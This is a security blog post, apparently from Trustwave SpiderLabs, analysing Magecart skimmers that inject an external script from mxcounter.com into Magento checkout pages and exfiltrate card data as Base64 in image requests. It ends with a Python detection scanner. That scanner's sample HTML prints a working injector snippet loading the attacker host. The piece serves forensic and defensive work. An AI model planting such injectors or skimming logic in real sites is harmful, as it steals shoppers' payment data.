SpiderLabs Blog

Digging Deep Into Magecart Malware | Trustwave

Written by Rodel Mendrez | Feb 21, 2019 6:00:00 AM

Last week, one of my SpiderLabs colleagues was working on a PCI forensic triage for a website. During his investigation, he asked me to check out some HTTP traffic he captured during an online retail store checkout session.

This was the HTTP capture:

At first glance, the GET request is very suspicious. Firstly, the HTTP Referer URL path contains “/checkout/onepage” (a very common URL target path of Magecart attacks). Secondly, the GET request goes to a third-party domain (mxcounter.com). And thirdly, it requests a “.GIF” file followed by a long Base64 encoded string.

So I immediately decoded the Base64 string, which resulted in the following:

Some obvious data exfiltration is going on there!

Next, I investigated the HTML source code of the checkout page and found this JavaScript at the bottom of the web page, which was not obvious at first:

De-obfuscating the code results in something like this:

Basically what this script does is:

  1. check if the current page URL location contains the string ‘out/onepag’ (a concatenated fragment of checkout/onepage)
  2. create a <script> element and point its external script source to 'https://mxcounter.com/click.js?v=1.7'
  3. append the <script> element to the HTML <head>

In short, it injects an external malicious script into the checkout page.

Checking out the JavaScript code from 'https://mxcounter.com/click.js?v=1.7' uncovers a skimming script, as seen in the image below. This script captures personal details and credit card data entered by the merchant’s customer on the checkout page. These details are stored in a JavaScript dictionary in a variable named ‘data’, encoded in Base64 and sent as a URL parameter to https://mxcounter.com/c.gif?<Base64 encoded data> in a GET request.

The WHOIS record of mxcounter.com shows that the IP address of the DNS A record is located in Ukraine:

There are actually multiple versions of this skimming JavaScript from the same domain, which probably cater to different infected online merchants.


For example, here’s version 1.6 of the script:


and version 1.8:


and version 2.0, and so on.

So with all this in mind, I was curious to find other websites with similar infections. I first tried Googling the URL “mxcounter.com”, but it didn’t really show me interesting results. What I really wanted was to search websites for a specific string in their HTML source code. I stumbled across a website called nerdydata.com which has the capability to do that:

The search result returned one website:


And sure enough, that website in the search result is infected:


So I tried a different search string, this time taken from the JavaScript code itself:

var img = document.createElement('script')

And there, it returned over 40 websites. I checked each of these websites and half of them were infected with Magecart malware scripts.

I also checked most of the exfiltration/skimming URLs, but some of them were already down at the time of this writing. In all of the infected web pages, the injected script’s source URL is Base64 encoded and decoded at runtime with the JavaScript method atob(). For example:

img.src = atob("aHR0cHM6Ly9teGNvdW50ZXIuY29t")

the string “aHR0cHM6Ly9teGNvdW50ZXIuY29t” is the Base64 encoding of https://mxcounter.com.

One of the interesting things I learned during this investigation is that some of these Magecart malware scripts are really sneaky.

Take, for example, this infected retail web page injected with a malicious JavaScript hosted at an external host:

That Base64 encoded string is actually the link to the malicious external script source:

Yet, when visiting that URL directly, you will get a “503 Service Unavailable” HTTP error.

However, only when you specify the correct HTTP headers (User-Agent, Referer and Host) does the server return the malicious JavaScript. Here we used Postman to request the same URL:

This code is still obfuscated; de-obfuscating it reveals the typical checkout page skimming routine, with exfiltration of data to the attacker’s host.

There are probably numerous other infected websites out there but here are the exfiltration/skimming JavaScript URLs I compiled during the investigation:


Most of the infected websites appear to be running old versions of the Magento framework, and exploitation of vulnerabilities in Magento is the most likely cause of the infection, but it is hard to know for sure without conducting further internal investigations. Other possibilities are admin panel brute-force attacks or spear-phishing attacks.

So, if you administer or own an e-commerce website running the Magento platform, you may want to scan your checkout pages for a possible compromise. You can scan for JavaScript code that uses the createElement() method, e.g. "var img = document.createElement('script')", and then check whether Base64 encoded strings follow it or whether the JavaScript method atob() is used. You can decode the strings with Base64 tools such as CyberChef (https://gchq.github.io/CyberChef/). This Base64 string is usually a URL. You should be able to decide whether this URL is something you expect or something suspicious.
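As an added example (not code from the post or from Trustwave), here is a small Python scanner that applies the check above to a page’s HTML: it looks for dynamic <script> creation, decodes every Base64 literal passed to atob(), and flags any decoded URL whose host is not the merchant’s own. The sample checkout HTML and the site host shop.example are constructed for the example; the Base64 literal is the one quoted in the post.

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Patterns from the post: dynamic <script> creation, and Base64 literals
# passed to atob() that hide the external script's URL from a plain grep.
CREATE_SCRIPT_RE = re.compile(r"document\.createElement\(\s*['\"]script['\"]\s*\)")
ATOB_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]{8,})['\"]\s*\)")

# Constructed sample: a trimmed checkout page carrying an injector in the
# style the post describes (not a real merchant page).
SAMPLE_HTML = """<html><head><title>Checkout</title></head><body>
<script>
if (location.href.indexOf('out/onepag') !== -1) {
  var img = document.createElement('script');
  img.src = atob("aHR0cHM6Ly9teGNvdW50ZXIuY29t") + '/click.js?v=1.7';
  document.getElementsByTagName('head')[0].appendChild(img);
}
</script>
<script src="/js/cart.js"></script>
</body></html>"""

def decode_b64(blob):
    """Decode a Base64 literal; return None if it is not valid Base64/UTF-8."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None

def find_injected_script_urls(html, site_host):
    """Return (decoded_value, is_third_party) for every atob() literal found
    in a page that also creates <script> elements dynamically."""
    if not CREATE_SCRIPT_RE.search(html):
        return []
    findings = []
    for blob in ATOB_RE.findall(html):
        decoded = decode_b64(blob)
        if decoded is None:
            continue
        host = urlparse(decoded).hostname
        third_party = host is not None and host != site_host
        findings.append((decoded, third_party))
    return findings

if __name__ == "__main__":
    for url, third_party in find_injected_script_urls(SAMPLE_HTML, "shop.example"):
        print(("SUSPECT " if third_party else "OK      ") + url)
```

Any hit marked SUSPECT is a decoded URL pointing off-site and deserves the same manual review the post describes; a hit pointing at your own host still warrants a look at why it was Base64 encoded.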